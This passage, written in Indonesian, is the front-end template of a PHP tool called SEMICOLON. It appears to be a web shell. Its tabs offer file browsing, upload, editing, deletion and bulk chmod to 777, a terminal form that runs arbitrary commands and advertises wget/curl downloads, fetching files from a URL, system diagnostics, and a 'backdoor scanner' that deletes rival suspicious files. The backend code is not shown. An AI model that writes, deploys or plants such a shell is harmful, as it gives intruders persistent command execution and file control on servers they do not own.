    font-size: 20px;
    margin-bottom: 20px;
    border-bottom: 2px solid #0f0;
    padding-bottom: 10px;
    display: inline-block;
}
input, select, textarea {
    background: #000;
    border: 2px solid #0f0;
    color: #0f0;
    padding: 12px;
    border-radius: 8px;
    font-family: monospace;
    width: 100%;
    margin: 10px 0;
    transition: 0.3s;
}
input:focus, select:focus, textarea:focus {
    outline: none;
    border-color: #0ff;
    box-shadow: 0 0 15px #0ff;
    transform: scale(1.01);
}
.terminal-box {
    background: #000;
    border: 2px solid #0f0;
    height: 400px;
    overflow-y: auto;
    padding: 18px;
    margin: 15px 0;
    font-size: 12px;
    border-radius: 12px;
    box-shadow: inset 0 0 30px rgba(0, 255, 0, 0.1);
}
.cmd-line {
    display: flex;
    gap: 12px;
    background: rgba(0, 20, 0, 0.9);
    border: 2px solid #0f0;
    padding: 12px 18px;
    border-radius: 12px;
    margin-top: 15px;
}
.bulk-actions {
    background: rgba(0, 35, 0, 0.9);
    border: 2px solid #0f0;
    padding: 18px;
    border-radius: 12px;
    margin: 15px 0;
    display: none;
    animation: borderPulse 2s infinite;
}
.info-box {
    background: rgba(0, 20, 0, 0.8);
    border: 1px solid #0f0;
    padding: 18px;
    border-radius: 12px;
    margin: 15px 0;
    backdrop-filter: blur(4px);
}
.scan-summary {
    background: rgba(0, 30, 0, 0.8);
    padding: 15px;
    margin-bottom: 20px;
    border-radius: 10px;
    border-left: 4px solid #f00;
}
.risk-high { color: #f00; font-weight: bold; text-shadow: 0 0 5px #f00; }
.risk-medium { color: #fa0; font-weight: bold; text-shadow: 0 0 3px #fa0; }
.risk-low { color: #ff0; }
.footer {
    text-align: center;
    padding: 25px;
    margin-top: 30px;
    border-top: 2px solid #0f0;
    font-size: 10px;
    background: rgba(0, 15, 0, 0.5);
    border-radius: 0 0 12px 12px;
}
.glitch-text {
    animation: glitch 3s infinite;
}
@media (max-width: 600px) {
    th, td { font-size: 10px; padding: 5px; }
    .btn { padding: 5px 12px; font-size: 10px; }
    .small-btn { padding: 3px 6px; font-size: 8px; }
    .tab { padding: 6px 12px; font-size: 11px; }
    .title { font-size: 18px; }
}
.editor-container {
    margin-top: 20px;
}
.editor-textarea {
    font-family: monospace;
    font-size: 13px;
    line-height: 1.5;
}
</style>
</head>
<body>
<canvas id="bg-canvas"></canvas>
<div class="container">
<div class="header">
<div class="title">⚡ SEMICOLON v<?php echo VERSION; ?> <span class="badge"><?php echo VERSION_NAME; ?></span></div>
<a href="?logout=1" class="logout">⛔ KELUAR</a>
</div>

<div class="tabs">
<button class="tab <?php echo $current_tab=='files'?'active':''; ?>" onclick="switchTab('files')">📁 FILE</button>
<button class="tab <?php echo $current_tab=='terminal'?'active':''; ?>" onclick="switchTab('terminal')">💻 TERMINAL</button>
<button class="tab <?php echo $current_tab=='scanner'?'active':''; ?>" onclick="switchTab('scanner')">🔍 SCANNER</button>
<button class="tab <?php echo $current_tab=='system'?'active':''; ?>" onclick="switchTab('system')">⚙️ SISTEM</button>
<button class="tab <?php echo $current_tab=='activity'?'active':''; ?>" onclick="switchTab('activity')">📋 LOG AKTIVITAS</button>
<?php if($edit_content): ?><button class="tab active">✏️ EDIT</button><?php endif; ?>
</div>

<?php if(isset($_SESSION['error'])): ?>
<div class="info-box" style="border-color:#f00;color:#f00;background:rgba(255,0,0,0.1)">⚠️ <?php echo $_SESSION['error']; unset($_SESSION['error']); ?></div>
<?php endif; ?>
<?php if(isset($_SESSION['success'])): ?>
<div class="info-box" style="border-color:#0f0;background:rgba(0,255,0,0.1)">✓ <?php echo $_SESSION['success']; unset($_SESSION['success']); ?></div>
<?php endif; ?>

<div id="files-tab" style="display:<?php echo $current_tab=='files'?'block':'none'; ?>">
<div class="path-bar">
    <a href="?path=<?php echo urlencode($parent_path); ?>&tab=files" class="back-btn <?php echo !$can_go_back ? 'disabled' : ''; ?>">◀◀ KEMBALI</a>
    <span class="current-path">📍 <?php echo htmlspecialchars($current_path); ?></span>
</div>

<div class="tool-bar">
<button class="btn" onclick="showModal('uploadModal')">📤 UPLOAD</button>
<button class="btn" onclick="showModal('createFileModal')">📄 FILE BARU</button>
<button class="btn" onclick="showModal('createFolderModal')">📁 FOLDER BARU</button>
<button class="btn" onclick="showModal('urlDownloadModal')">🌐 DOWNLOAD URL</button>
<button class="btn" onclick="refreshCurrent()">🔄 REFRESH</button>
</div>

<div id="bulkActions" class="bulk-actions">
<span id="selectedCount" style="font-weight:bold">0</span> item dipilih &nbsp;|&nbsp;
<button class="btn btn-danger" onclick="deleteSelected()">🗑️ HAPUS TERPILIH</button>
<select id="bulkPermSelect" style="background:#000;color:#0f0;border:1px solid #0f0;padding:6px;margin-left:12px;border-radius:6px"><option value="644">644</option><option value="755">755</option><option value="777">777</option></select>
<button class="btn" onclick="applyBulkChmod()">🔧 CHMOD</button>
</div>

<?php if(empty($folders) && empty($files)): ?>
<div class="info-box" style="text-align:center">📂 DIREKTORI KOSONG</div>
<?php else: ?>
<table class="table">
<thead>
<tr>
<th class="checkbox-cell"><input type="checkbox" onclick="selectAllFiles(this)"></th>
<th>NAMA</th>
<th>UKURAN</th>
<th>PERMISI</th>
<th>MODIFIKASI</th>
<th>AKSI</th>
</tr>
</thead>
<tbody>
<?php if($can_go_back): ?>
<tr>
<td class="checkbox-cell">-</td>
<td>📁 <a href="?path=<?php echo urlencode($parent_path); ?>&tab=files" class="dir-link">.. (INDUK)</a></td>
<td>-</td>
<td>-</td>
<td>-</td>
<td>-</td>
</tr>
<?php endif; ?>
<?php foreach($folders as $f): ?>
<tr>
<td class="checkbox-cell"><input type="checkbox" class="file-checkbox" data-path="<?php echo htmlspecialchars($f['path']); ?>"></td>
<td>📁 <a href="?path=<?php echo urlencode($f['path']); ?>&tab=files" class="dir-link"><?php echo htmlspecialchars($f['name']); ?>/</a></td>
<td><?php echo $f['size']; ?></td>
<td><?php echo $f['perms']; ?> <button class="small-btn" onclick="chmodItem('<?php echo htmlspecialchars($f['path']); ?>',this)">ch</button></td>
<td><?php echo $f['modified']; ?></td>
<td class="actions">
<button class="small-btn" onclick="renameItem('<?php echo htmlspecialchars($f['path']); ?>','<?php echo htmlspecialchars($f['name']); ?>')">GANTI NAMA</button>
<button class="small-btn btn-danger" onclick="deleteItem('<?php echo htmlspecialchars($f['path']); ?>')">HAPUS</button>
</td>
</tr>
<?php endforeach; ?>
<?php foreach($files as $f): ?>
<tr>
<td class="checkbox-cell"><input type="checkbox" class="file-checkbox" data-path="<?php echo htmlspecialchars($f['path']); ?>"></td>
<td>📄 <a href="?edit=<?php echo urlencode($f['path']); ?>&path=<?php echo urlencode($current_path); ?>" class="file-link"><?php echo htmlspecialchars($f['name']); ?></a></td>
<td><?php echo $f['size']; ?></td>
<td><?php echo $f['perms']; ?> <button class="small-btn" onclick="chmodItem('<?php echo htmlspecialchars($f['path']); ?>',this)">ch</button></td>
<td><?php echo $f['modified']; ?></td>
<td class="actions">
<button class="small-btn" onclick="downloadFile('<?php echo htmlspecialchars($f['path']); ?>')">DOWNLOAD</button>
<button class="small-btn" onclick="editFile('<?php echo htmlspecialchars($f['path']); ?>')">EDIT</button>
<button class="small-btn" onclick="renameItem('<?php echo htmlspecialchars($f['path']); ?>','<?php echo htmlspecialchars($f['name']); ?>')">GANTI NAMA</button>
<button class="small-btn btn-danger" onclick="deleteItem('<?php echo htmlspecialchars($f['path']); ?>')">HAPUS</button>
</td>
</tr>
<?php endforeach; ?>
</tbody>
</table>
<?php endif; ?>
</div>

<div id="terminal-tab" style="display:<?php echo $current_tab=='terminal'?'block':'none'; ?>">
<div class="path-bar">💻 TERMINAL // <?php echo htmlspecialchars($current_path); ?></div>
<div class="terminal-box" id="termOut">
<div>┌─────────────────────────────────────────────────┐</div>
<div>│  SEMICOLON v<?php echo VERSION; ?> - NEO TERMINAL        │</div>
<div>├─────────────────────────────────────────────────┤</div>
<div>│  perintah: pwd, ls, whoami, id, date, cat      │</div>
<div>│  download: wget URL, curl -o file URL          │</div>
<div>│  help: tampilkan menu ini                      │</div>
<div>└─────────────────────────────────────────────────┘</div>
<div style="margin-top:10px">$ pwd</div>
<div><?php echo htmlspecialchars($current_path); ?></div>
<?php if(isset($_SESSION['terminal_output'])): ?>
<div style="margin-top:10px;border-top:1px solid #0f0;padding-top:10px">$ <?php echo htmlspecialchars($_SESSION['last_command']??''); ?></div>
<div><?php echo nl2br(htmlspecialchars($_SESSION['terminal_output'])); unset($_SESSION['terminal_output']); ?></div>
<?php endif; ?>
</div>
<form method="post" class="cmd-line">
<input type="hidden" name="current_path" value="<?php echo htmlspecialchars($current_path); ?>">
<span style="color:#0ff;font-weight:bold">➜</span>
<input type="text" name="terminal_cmd" id="termInput" style="flex:1;background:transparent;border:none;color:#0f0;outline:none;font-family:monospace" autocomplete="off" placeholder="masukkan perintah...">
<button type="submit" name="terminal_cmd" class="btn">EKSEKUSI</button>
</form>
</div>

<div id="scanner-tab" style="display:<?php echo $current_tab=='scanner'?'block':'none'; ?>">
<div class="path-bar">🔍 BACKDOOR SCANNER // MODE DETEKSI</div>

<div class="info-box">
<h3 style="margin-bottom:10px">📄 CEK FILE CEPAT</h3>
<form method="post" action="">
<input type="hidden" name="current_path" value="<?php echo htmlspecialchars($current_path); ?>">
<div style="display:flex;gap:10px;flex-wrap:wrap">
<input type="text" name="file_path" placeholder="/path/lengkap/ke/file.php" style="flex:2" value="<?php echo htmlspecialchars($checked_file ?? ''); ?>">
<button type="submit" name="quick_check" class="btn">🔍 SCAN FILE</button>
</div>
</form>
<?php if($quick_check_result): ?>
<div style="margin-top:15px;padding:15px;background:rgba(0,30,0,0.8);border-radius:10px;border-left:4px solid <?php echo strpos($quick_check_result, 'TERINDIKASI') !== false ? '#f00' : '#0f0'; ?>">
<div><strong>📁 File:</strong> <?php echo htmlspecialchars($checked_file); ?></div>
<div><strong>🎯 Hasil:</strong> 
<span style="color:<?php echo strpos($quick_check_result, 'TERINDIKASI') !== false ? '#f00' : '#0f0'; ?>;font-weight:bold">
<?php echo htmlspecialchars($quick_check_result); ?>
</span>
</div>
</div>
<?php unset($_SESSION['quick_check_result'], $_SESSION['checked_file']); ?>
<?php endif; ?>
</div>

<div class="info-box">
<h3 style="margin-bottom:10px">🚀 SCAN DIREKTORI FULL</h3>
<form method="post" action="">
<input type="hidden" name="current_path" value="<?php echo htmlspecialchars($current_path); ?>">
<div style="margin-bottom:12px">
<label>📁 Target Path:</label>
<input type="text" name="scan_path" value="<?php echo htmlspecialchars($current_path); ?>" style="width:100%">
</div>
<div style="margin-bottom:12px">
<label>⚡ Kedalaman Scan:</label>
<select name="scan_type" style="width:100%">
<option value="quick">⚡ Cepat (maks 1500 file)</option>
<option value="deep">🔍 Mendalam (maks 5000 file)</option>
</select>
</div>
<button type="submit" name="start_scan" class="btn" onclick="return confirm('⚠️ Mulai scan? Ini mungkin memakan waktu beberapa detik...')">🚀 MULAI SCAN</button>
</form>
</div>

<?php if($scan_results): ?>
<div class="info-box" style="border:2px solid #f00;background:rgba(255,0,0,0.05)">
<h3 style="color:#f00;margin-bottom:10px">📊 HASIL SCAN</h3>
<div class="scan-summary">
<div><strong>📂 Path:</strong> <?php echo htmlspecialchars($scan_results['scan_path']); ?></div>
<div><strong>⚡ Tipe:</strong> <?php echo ucfirst($scan_results['scan_type']); ?></div>
<div><strong>📄 File Discan:</strong> <?php echo number_format($scan_results['file_count']); ?></div>
<div><strong>⚠️ Mencurigakan:</strong> <span style="color:#f00;font-weight:bold"><?php echo count($scan_results['suspicious_files']); ?></span></div>
<div><strong>⏱️ Waktu:</strong> <?php echo $scan_results['scan_time']; ?> detik</div>
</div>

<?php if(empty($scan_results['suspicious_files'])): ?>
<div style="text-align:center;padding:40px;color:#0f0">✅ BERSIH - Tidak ada pola mencurigakan terdeteksi</div>
<?php else: ?>
<form method="post" action="" onsubmit="return confirm('⚠️ HAPUS PERMANEN file terpilih? Ini tidak bisa dibatalkan!')">
<input type="hidden" name="current_path" value="<?php echo htmlspecialchars($current_path); ?>">
<div style="margin-bottom:15px">
<button type="submit" name="delete_selected_backdoors" class="btn btn-danger">🗑️ HAPUS FILE TERPILIH</button>
</div>
<table class="table">
<thead>
<tr>
<th class="checkbox-cell"><input type="checkbox" onclick="selectAllBackdoors(this)"></th>
<th>FILE</th>
<th>RISIKO</th>
<th>UKURAN</th>
<th>PERMISI</th>
<th>POLA</th>
<th>AKSI</th>
</tr>
</thead>
<tbody>
<?php foreach($scan_results['suspicious_files'] as $bf): ?>
<tr>
<td class="checkbox-cell"><input type="checkbox" name="backdoor_files[]" value="<?php echo htmlspecialchars($bf['path']); ?>" class="bd-checkbox"></td>
<td style="word-break:break-all;max-width:300px"><?php echo htmlspecialchars($bf['path']); ?></td>
<td class="<?php echo $bf['risk'] == 'TINGGI' ? 'risk-high' : ($bf['risk'] == 'SEDANG' ? 'risk-medium' : 'risk-low'); ?>">
<?php echo $bf['risk']; ?> (<?php echo $bf['score']; ?>)
</td>
<td><?php echo $bf['size']; ?></td>
<td><?php echo $bf['perms']; ?></td>
<td><small><?php echo implode(', ', array_slice($bf['patterns'], 0, 4)); ?></small></td>
<td class="actions">
<button type="button" class="small-btn" onclick="editFile('<?php echo htmlspecialchars($bf['path']); ?>')">EDIT</button>
<button type="button" class="small-btn btn-danger" onclick="deleteBackdoor('<?php echo htmlspecialchars($bf['path']); ?>')">HAPUS</button>
</td>
</tr>
<?php endforeach; ?>
</tbody>
</table>
</form>
<?php endif; ?>
</div>
<?php endif; ?>
</div>

<div id="system-tab" style="display:<?php echo $current_tab=='system'?'block':'none'; ?>">
<div class="path-bar">⚙️ DIAGNOSTIK SISTEM</div>
<?php $sys_info = getSystemInfo(); ?>
<?php foreach($sys_info as $cat=>$data): ?>
<h3 style="margin:20px 0 12px;color:#0ff">▶ <?php echo strtoupper($cat); ?></h3>
<table class="table"><?php foreach($data as $k=>$v): ?>
<tr><th style="width:35%"><?php echo $k; ?></th><td><?php echo htmlspecialchars($v); ?></td></tr>
<?php endforeach; ?></table>
<?php endforeach; ?>
</div>

<div id="activity-tab" style="display:<?php echo $current_tab=='activity'?'block':'none'; ?>">
<div class="path-bar">📋 LOG AKTIVITAS REAL-TIME &nbsp; <span id="logRefreshIndicator" style="font-size:10px;color:#0ff;">● LIVE</span></div>

<div class="info-box">
    <div style="display:flex;justify-content:space-between;align-items:center;flex-wrap:wrap;gap:10px;margin-bottom:15px;">
        <div><strong>📊 Statistik</strong></div>
        <div style="display:flex;gap:10px;">
            <button class="btn" onclick="refreshLogs()">🔄 REFRESH</button>
            <button class="btn" onclick="exportLogs('text')">📄 EXPORT TXT</button>
            <button class="btn" onclick="exportLogs('json')">📊 EXPORT JSON</button>
            <button class="btn btn-danger" onclick="clearOldLogs()">🗑️ HAPUS LAMA (>30 hari)</button>
        </div>
    </div>
    
    <?php $log_stats = getLogStats(); ?>
    <div style="display:grid;grid-template-columns:repeat(auto-fit,minmax(150px,1fr));gap:10px;margin-bottom:20px;">
        <div style="background:rgba(0,30,0,0.8);padding:10px;border-radius:8px;">
            <div style="font-size:10px;opacity:0.7">TOTAL LOG</div>
            <div style="font-size:20px;font-weight:bold;"><?php echo number_format($log_stats['total_logs']); ?></div>
        </div>
        <div style="background:rgba(0,30,0,0.8);padding:10px;border-radius:8px;">
            <div style="font-size:10px;opacity:0.7">HARI INI</div>
            <div style="font-size:20px;font-weight:bold;"><?php echo number_format($log_stats['today_logs']); ?></div>
        </div>
        <div style="background:rgba(0,30,0,0.8);padding:10px;border-radius:8px;">
            <div style="font-size:10px;opacity:0.7">TOTAL UKURAN</div>
            <div style="font-size:20px;font-weight:bold;"><?php echo $log_stats['log_size']; ?></div>
        </div>
        <div style="background:rgba(0,30,0,0.8);padding:10px;border-radius:8px;">
            <div style="font-size:10px;opacity:0.7">AKTIVITAS TERAKHIR</div>
            <div style="font-size:12px;font-weight:bold;"><?php echo $log_stats['latest_log'] ?? 'N/A'; ?></div>
        </div>
    </div>
    
    <div style="margin-bottom:15px;">
        <input type="text" id="logFilter" placeholder="🔍 Filter log... (ketik dan tekan Enter)" style="width:100%;" onkeypress="if(event.key==='Enter') filterLogs()">
    </div>
</div>

<div id="logContainer" class="terminal-box" style="height:500px;overflow-y:auto;font-family:monospace;font-size:11px;background:#000;">
    <div style="color:#888;text-align:center;padding:20px;">Memuat log...</div>
</div>

<div class="info-box" style="margin-top:15px;">
    <small>
        ⚡ Auto-refresh setiap 60 detik | 
        📁 Lokasi log: /logs/ | 
        💡 Klik pada baris log untuk menyalin
    </small>
</div>
</div>

<?php if($edit_content !== null && $edit_file_path !== null): ?>
<div id="edit-tab" style="display:block">
<div class="path-bar">✏️ MENGEDIT FILE: <?php echo htmlspecialchars(basename($edit_file_path)); ?></div>
<div class="info-box">
    <div><strong>📁 Path lengkap:</strong> <?php echo htmlspecialchars($edit_file_path); ?></div>
    <div><strong>📏 Ukuran:</strong> <?php echo formatBytes(filesize($edit_file_path)); ?></div>
    <div><strong>🔐 Permission:</strong> <?php echo substr(sprintf('%o', fileperms($edit_file_path)), -4); ?></div>
</div>
<form method="post" action="">
<input type="hidden" name="file_path" value="<?php echo htmlspecialchars($edit_file_path); ?>">
<input type="hidden" name="current_path" value="<?php echo htmlspecialchars($current_path); ?>">
<textarea name="file_content" class="editor-textarea" style="width:100%;height:500px;margin:15px 0;background:#0a0a0a;border:2px solid #0f0;color:#0f0;padding:15px;font-family:monospace;font-size:13px;border-radius:12px;line-height:1.5;"><?php echo $edit_content; ?></textarea>
<div class="tool-bar" style="justify-content:space-between;">
    <div>
        <button type="submit" name="edit_file" class="btn">💾 SIMPAN PERUBAHAN</button>
        <button type="button" class="btn" onclick="switchTab('files')">❌ BATAL</button>
    </div>
    <div>
        <button type="button" class="btn" onclick="window.location.href='?download=<?php echo urlencode($edit_file_path); ?>'">📥 DOWNLOAD</button>
    </div>
</div>
</form>
</div>
<?php endif; ?>

<div class="footer">
<span class="glitch-text">SEMICOLON v<?php echo VERSION; ?> // NEO-DIMENSIONAL // ALL SYSTEMS ONLINE</span>
</div>
</div>

<div id="uploadModal" class="modal"><div class="modal-content"><div class="modal-title">📤 UPLOAD FILE</div><form method="post" enctype="multipart/form-data"><input type="hidden" name="current_path" value="<?php echo htmlspecialchars($current_path); ?>"><input type="file" name="files[]" multiple><button type="submit" name="upload" class="btn">UPLOAD</button><button type="button" class="btn" onclick="hideModal('uploadModal')">BATAL</button></form></div></div>
<div id="urlDownloadModal" class="modal"><div class="modal-content"><div class="modal-title">🌐 DOWNLOAD DARI URL</div><form method="post"><input type="hidden" name="current_path" value="<?php echo htmlspecialchars($current_path); ?>"><input type="url" name="download_url" placeholder="https://contoh.com/file.zip" required><input type="text" name="filename" placeholder="simpan sebagai (opsional)"><button type="submit" name="download_url_submit" class="btn">DOWNLOAD</button><button type="button" class="btn" onclick="hideModal('urlDownloadModal')">BATAL</button></form></div></div>
<div id="renameModal" class="modal"><div class="modal-content"><div class="modal-title">✏️ GANTI NAMA ITEM</div><form method="post"><input type="hidden" name="old_path" id="renameOld"><input type="hidden" name="current_path" value="<?php echo htmlspecialchars($current_path); ?>"><input type="text" name="new_name" id="renameNew" placeholder="nama baru"><button type="submit" name="rename" class="btn">GANTI NAMA</button><button type="button" class="btn" onclick="hideModal('renameModal')">BATAL</button></form></div></div>
<div id="createFileModal" class="modal"><div class="modal-content"><div class="modal-title">📄 BUAT FILE BARU</div><form method="post"><input type="hidden" name="current_path" value="<?php echo htmlspecialchars($current_path); ?>"><input type="text" name="filename" placeholder="namafile.php" required><button type="submit" name="create_file" class="btn">BUAT</button><button type="button" class="btn" onclick="hideModal('createFileModal')">BATAL</button></form></div></div>
<div id="createFolderModal" class="modal"><div class="modal-content"><div class="modal-title">📁 BUAT FOLDER BARU</div><form method="post"><input type="hidden" name="current_path" value="<?php echo htmlspecialchars($current_path); ?>"><input type="text" name="foldername" placeholder="namafolder" required><button type="submit" name="create_folder" class="btn">BUAT</button><button type="button" class="btn" onclick="hideModal('createFolderModal')">BATAL</button></form></div></div>

<script>
const canvas = document.getElementById('bg-canvas');
const ctx = canvas.getContext('2d');
canvas.width = window.innerWidth;
canvas.height = window.innerHeight;
const chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789$#@%&!?.;:<>/\\|';
const fontSize = 14;
let columns = Math.floor(canvas.width / fontSize);
let drops = [];
for (let i = 0; i < columns; i++) drops[i] = Math.random() * -100;
function drawMatrix() {
    ctx.fillStyle = 'rgba(0, 0, 0, 0.05)';
    ctx.fillRect(0, 0, canvas.width, canvas.height);
    ctx.fillStyle = '#0f0';
    ctx.font = fontSize + 'px monospace';
    for (let i = 0; i < drops.length; i++) {
        const char = chars[Math.floor(Math.random() * chars.length)];
        ctx.fillText(char, i * fontSize, drops[i] * fontSize);
        if (drops[i] * fontSize > canvas.height && Math.random() > 0.975) drops[i] = 0;
        drops[i]++;
    }
}
setInterval(drawMatrix, 50);
window.addEventListener('resize', () => {
    canvas.width = window.innerWidth;
    canvas.height = window.innerHeight;
    columns = Math.floor(canvas.width / fontSize);
    drops = [];
    for (let i = 0; i < columns; i++) drops[i] = Math.random() * -100;
});

function switchTab(t){ let p=new URLSearchParams(window.location.search); p.set('tab',t); p.delete('edit'); window.location.search=p.toString(); }
function navigateTo(p){ window.location.href='?path='+encodeURIComponent(p)+'&tab=files'; }
function refreshCurrent(){ navigateTo('<?php echo addslashes($current_path); ?>'); }
function showModal(id){ document.getElementById(id).style.display='flex'; }
function hideModal(id){ document.getElementById(id).style.display='none'; }
function editFile(p){ window.location.href='?edit='+encodeURIComponent(p)+'&path='+encodeURIComponent('<?php echo addslashes($current_path); ?>'); }
function downloadFile(p){ window.location.href='?download='+encodeURIComponent(p); }
function deleteItem(p){ if(confirm('⚠️ HAPUS PERMANEN?\n'+p)) window.location.href='?delete='+encodeURIComponent(p)+'&path='+encodeURIComponent('<?php echo addslashes($current_path); ?>')+'&tab=files'; }
function renameItem(p,n){ document.getElementById('renameOld').value=p; document.getElementById('renameNew').value=n; showModal('renameModal'); }
function chmodItem(p,btn){ let newPerm=prompt('Masukkan permission (3-4 digit octal):', btn.parentElement.innerText.trim().split(' ')[0]); if(newPerm && /^[0-7]{3,4}$/.test(newPerm)){ let f=document.createElement('form');f.method='post';f.innerHTML='<input type="hidden" name="chmod" value="1"><input type="hidden" name="chmod_path" value="'+p+'"><input type="hidden" name="permission" value="'+newPerm+'"><input type="hidden" name="current_path" value="<?php echo addslashes($current_path); ?>">'; document.body.appendChild(f); f.submit(); } }
function selectAllFiles(cb){ document.querySelectorAll('.file-checkbox').forEach(ch=>ch.checked=cb.checked); toggleBulkActions(); }
function toggleBulkActions(){ let c=document.querySelectorAll('.file-checkbox:checked').length; document.getElementById('bulkActions').style.display=c>0?'block':'none'; document.getElementById('selectedCount').innerText=c; }
function deleteSelected(){ let sel=[...document.querySelectorAll('.file-checkbox:checked')]; if(sel.length==0||!confirm('⚠️ HAPUS '+sel.length+' item secara permanen?')) return; let f=document.createElement('form');f.method='post';f.innerHTML='<input type="hidden" name="bulk_delete" value="1"><input type="hidden" name="current_path" value="<?php echo addslashes($current_path); ?>">'; sel.forEach((cb,i)=>{ let inp=document.createElement('input'); inp.type='hidden'; inp.name='selected_items['+i+']'; inp.value=cb.dataset.path; f.appendChild(inp); }); document.body.appendChild(f); f.submit(); }
function applyBulkChmod(){ let sel=[...document.querySelectorAll('.file-checkbox:checked')]; if(sel.length==0) return; let perm=document.getElementById('bulkPermSelect').value; if(!confirm('Terapkan chmod '+perm+' ke '+sel.length+' item?')) return; let f=document.createElement('form');f.method='post';f.innerHTML='<input type="hidden" name="bulk_chmod" value="1"><input type="hidden" name="bulk_permission" value="'+perm+'"><input type="hidden" name="current_path" value="<?php echo addslashes($current_path); ?>">'; sel.forEach((cb,i)=>{ let inp=document.createElement('input'); inp.type='hidden'; inp.name='selected_items['+i+']'; inp.value=cb.dataset.path; f.appendChild(inp); }); document.body.appendChild(f); f.submit(); }
function selectAllBackdoors(cb){ document.querySelectorAll('.bd-checkbox').forEach(ch=>ch.checked=cb.checked); }
function deleteBackdoor(p){ if(confirm('⚠️ HAPUS backdoor ini?\n'+p)){ let f=document.createElement('form');f.method='post';f.innerHTML='<input type="hidden" name="delete_backdoor" value="1"><input type="hidden" name="backdoor_path" value="'+p+'"><input type="hidden" name="current_path" value="<?php echo addslashes($current_path); ?>">'; document.body.appendChild(f); f.submit(); } }
document.querySelectorAll('.file-checkbox').forEach(cb=>cb.addEventListener('change',toggleBulkActions));
<?php if($current_tab=='terminal'): ?>document.getElementById('termInput')?.focus();<?php endif; ?>
window.onclick=function(e){ if(e.target.classList.contains('modal')) e.target.style.display='none'; };

let logRefreshInterval = null;
let currentFilter = '';

function loadLogs() {
    fetch(window.location.pathname + '?ajax_logs=1' + (currentFilter ? '&filter=' + encodeURIComponent(currentFilter) : ''))
        .then(response => response.json())
        .then(data => {
            const container = document.getElementById('logContainer');
            if (!container) return;
            
            if (data.logs && data.logs.length > 0) {
                container.innerHTML = data.logs.map(log => {
                    let color = '#0f0';
                    if (log.includes('LOGIN')) color = '#0ff';
                    else if (log.includes('PERINTAH')) color = '#ff0';
                    else if (log.includes('HAPUS') || log.includes('BACKDOOR')) color = '#f00';
                    else if (log.includes('UPLOAD')) color = '#fa0';
                    else if (log.includes('ERROR')) color = '#f66';
                    return `<div style="border-bottom:1px solid #0a0;padding:6px 4px;font-family:monospace;cursor:pointer;" onclick="copyToClipboard(this.innerText)">
                                <span style="color:${color}">▶</span> 
                                <span style="color:#aaa;">${escapeHtml(log)}</span>
                            </div>`;
                }).join('');
                container.scrollTop = container.scrollHeight;
            } else {
                container.innerHTML = '<div style="color:#888;text-align:center;padding:20px;">📭 Tidak ada log ditemukan</div>';
            }
            
            const indicator = document.getElementById('logRefreshIndicator');
            if (indicator) {
                indicator.style.opacity = '1';
                setTimeout(() => { if(indicator) indicator.style.opacity = '0.5'; }, 500);
            }
        })
        .catch(err => {
            console.error('Gagal memuat log:', err);
            const container = document.getElementById('logContainer');
            if (container) {
                container.innerHTML = '<div style="color:#f00;text-align:center;padding:20px;">⚠️ Gagal memuat log</div>';
            }
        });
}

function refreshLogs() { loadLogs(); }
function filterLogs() { currentFilter = document.getElementById('logFilter').value; loadLogs(); }
function exportLogs(format) { window.location.href = window.location.pathname + '?export_logs=' + format; }
function clearOldLogs() { if(confirm('⚠️ Hapus semua log yang lebih tua dari 30 hari? Tindakan ini tidak bisa dibatalkan.')) { fetch(window.location.pathname + '?clear_old_logs=1', { method: 'POST' }).then(() => { refreshLogs(); setTimeout(() => window.location.reload(), 500); }); } }
function copyToClipboard(text) { navigator.clipboard.writeText(text); const indicator = document.getElementById('logRefreshIndicator'); if(indicator) { indicator.style.color = '#0f0'; indicator.innerText = '✓ DISALIN'; setTimeout(() => { indicator.innerText = '● LIVE'; indicator.style.color = '#0ff'; }, 1000); } }
function escapeHtml(text) { const div = document.createElement('div'); div.textContent = text; return div.innerHTML; }

function startLogAutoRefresh() {
    if (logRefreshInterval) clearInterval(logRefreshInterval);
    logRefreshInterval = setInterval(() => {
        const activityTab = document.getElementById('activity-tab');
        if (activityTab && activityTab.style.display !== 'none') {
            loadLogs();
        }
    }, 60000);
}

if (document.getElementById('activity-tab')) {
    startLogAutoRefresh();
    loadLogs();
}
</script>
</body>
</html>